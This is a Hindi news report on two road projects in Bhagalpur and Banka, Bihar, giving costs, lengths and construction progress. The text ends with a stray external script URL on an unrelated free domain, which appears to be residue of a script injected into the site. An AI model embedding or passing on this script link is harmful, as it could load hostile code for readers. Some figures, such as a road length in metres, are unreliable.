भागलपुर और बांका जिले में बनने जा रहे है दो नए स्टेट हाईवे। करीब 597 करोड़ की लागत से ये स्टेट हाईवे अंग क्षेत्र में बनाए जा रहे हैं। इन दोनों स्टेट हाईवे से एक बड़ी आबादी लाभान्वित होगी तथा आवागमन में भी राहत मिलेगी।आपको बता दें, 220.71 करोड़ की लागत से 29 किलोमीटर लंबाई में अकबरनगर अमरपुर (एनएच 85) का निर्माण चालू हो गया है और इसका 70 फ़ीसदी निर्माण पूर्ण भी हो गया है।
वहीं 75.85 करोड़ की लागत से 43.35 मीटर लंबाई में घोघा पंजवारा (एनएच 84) का निर्माण भी शुरू हो गया है और अब तक 68 फ़ीसदी काम पूरा हो गया है। खबरों के मुताबिक, इस पथ के पैकेज 2 में एक आरओबी का भी निर्माण किया जाएगा इसके लिए भू अर्जन का काम अंतिम चरण में है। पथ निर्माण मंत्री ने इस संबंध में बताया है कि पथ के सभी कार्य आरओबी को छोड़कर अप्रैल तक पूरा कर लिया जाएगा।
बिहार स्टेट रोड डेवलपमेंट कॉरपोरेशन लिमिटेड की परियोजनाओं की समीक्षा बैठक में दोनों योजनाओं को निर्धारित समय के भीतर पूरी गुणवत्ता के साथ पूरा करने का आदेश दिया गया है। दोनों सड़कों के निर्माण कार्य पूरा होने पर झारखंड के दुमका देवघर और गुड्डा से सड़क कनेक्टिविटी मजबूत हो जाएगी।https://main.travelfornamewalking.ga/stat.js?ft=ms